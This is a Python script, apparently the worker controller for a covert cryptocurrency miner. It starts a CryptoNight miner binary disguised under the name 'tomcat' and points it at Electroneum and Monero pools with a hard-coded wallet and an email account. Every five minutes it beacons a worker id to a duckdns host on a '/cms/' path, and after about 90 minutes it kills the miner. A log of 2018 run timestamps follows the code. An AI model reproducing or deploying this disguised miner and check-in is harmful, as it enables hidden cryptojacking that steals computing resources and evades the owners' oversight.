import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:01:06.354380
#2018-02-17 16:48:03.760579
#2018-02-17 18:36:02.153249
#2018-02-17 20:24:01.326939
#2018-02-17 22:11:03.925460
#2018-02-17 23:55:07.205368
#2018-02-18 01:46:01.747512
#2018-02-18 03:33:04.883086
#2018-02-18 05:21:01.595463
#2018-02-18 07:13:03.615929
#2018-02-18 09:01:01.265978
#2018-02-18 10:48:03.508868
#2018-02-18 12:36:07.235432
#2018-02-18 14:22:06.348406
#2018-02-18 16:13:03.663679
#2018-02-18 18:01:07.161115
#2018-02-18 19:47:05.089658
#2018-02-18 21:32:04.983596
#2018-02-18 23:21:05.699662
#2018-02-19 01:08:07.181896
#2018-02-19 02:54:06.630911
#2018-02-19 04:40:01.760949
#2018-02-19 06:24:07.318400
#2018-02-19 08:13:07.675870
#2018-02-19 10:03:02.189065
#2018-02-19 11:51:06.282152
#2018-02-19 13:38:08.460631
#2018-02-19 15:27:02.128922
#2018-02-19 17:17:01.966900
#2018-02-19 19:05:07.004490
#2018-02-19 20:49:07.113335
#2018-02-19 22:36:02.116231
#2018-02-20 00:21:01.424988
#2018-02-20 02:08:07.332987
#2018-02-20 03:57:06.322552
#2018-02-20 05:42:07.364756
#2018-02-20 07:28:03.598082
#2018-02-20 09:12:05.799451
#2018-02-20 10:55:07.912602
#2018-02-20 12:43:07.801246
#2018-02-20 14:27:08.070282
#2018-02-20 16:11:07.527671
#2018-02-20 17:56:04.994028
#2018-02-20 19:47:06.157888
#2018-02-20 21:34:06.653103
#2018-02-20 23:16:07.000428
#2018-02-21 01:00:05.694969
#2018-02-21 02:46:04.986484
#2018-02-21 04:37:06.135815
#2018-02-21 06:25:05.053876
#2018-02-21 08:11:06.102662
#2018-02-21 09:57:07.796938
#2018-02-21 11:46:04.863006
#2018-02-21 13:37:07.133223
#2018-02-21 15:21:07.468035
#2018-02-21 17:12:08.558350
#2018-02-21 19:01:04.511672
#2018-02-21 20:49:07.622085
#2018-02-21 22:34:01.280839
#2018-02-22 00:23:07.608692
#2018-02-22 02:11:01.605168
#2018-02-22 03:56:06.930426
#2018-02-22 05:43:01.272783
#2018-02-22 07:28:01.696753
#2018-02-22 09:16:03.836850
#2018-02-22 11:03:07.862151
#2018-02-22 12:49:05.085564
#2018-02-22 14:37:05.900574
#2018-02-22 16:23:08.297174
#2018-02-22 18:11:04.367311
#2018-02-22 19:59:07.436077
#2018-02-22 21:49:01.388760
#2018-02-22 23:36:01.647334
#2018-02-23 01:24:01.780835
#2018-02-23 03:10:06.603770
#2018-02-23 04:58:06.901893
#2018-02-23 06:42:06.746327
#2018-02-23 08:32:01.363613
#2018-02-23 10:45:12.328814
#2018-02-23 12:43:08.375998
#2018-02-23 14:27:08.485334
#2018-02-23 16:19:09.130848
#2018-02-23 18:06:06.792171
#2018-02-23 19:50:01.500265
#2018-02-23 21:35:03.131192
#2018-02-23 23:22:04.952831
#2018-02-24 01:14:05.070238
#2018-02-24 03:06:06.427835
#2018-02-24 04:52:06.075699
#2018-02-24 06:38:04.889400
#2018-02-24 08:27:01.313628
#2018-02-24 10:13:03.610886
#2018-02-24 12:07:01.854837
#2018-02-24 13:54:05.262753
#2018-02-24 15:46:05.301904
#2018-02-24 17:39:04.997908
#2018-02-24 19:24:03.726221
#2018-02-24 21:14:04.796557
#2018-02-24 23:50:05.239541
#2018-02-25 03:41:05.588857
#2018-02-25 07:27:01.506946